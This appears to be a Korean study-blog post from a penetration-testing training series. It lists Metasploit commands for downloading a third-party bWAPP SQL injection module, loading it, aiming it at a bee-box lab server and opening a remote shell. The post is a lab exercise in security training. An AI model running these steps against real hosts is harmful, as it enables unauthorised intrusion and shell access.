환경
Kali Linux
실행 순서
cd /usr/share/metasploit-framework/modules/exploits/multi/http -> metasploit module directory로 이동
wget https://raw.githubusercontent.com/naiduv/codecrawl/master/code/bwapp-sqli.rb -> 코드 다운
mv bwapp-sqli.rb bwapp_sqli.rb -> -으로 인해 생기는 오류 방지를 위해 _로 변경
msfdb init -> db와 연동
msfconsole -> 콘솔 실행
search bwapp -> 다운받은 코드 검색
use exploit/multi/http/bwapp_sqli -> 코드 사용
show options -> 옵션 확인
set RHOSTS ip -> 공격할 bee box server ip 입력
show options -> 값 설정한 것 확인
check -> check 함수로 취약점 진단
run -> 실행
shell -> bee box server의 shell 사용
ls -> 사용 가능해진 것 확인
'🔐 [정보보안] 모의해킹 침해대응 전문가 취업캠프 > 모의해킹' 카테고리의 다른 글
| [모의해킹] 포트폴리오 (0) | 2023.11.24 |
|---|---|
| [모의해킹] Spoofing (0) | 2023.11.15 |
| [모의해킹] DVWA 환경 설정 (0) | 2023.11.09 |
| [모의해킹] Injection (0) | 2023.11.08 |
| [모의해킹] 환경 설정 (0) | 2023.11.08 |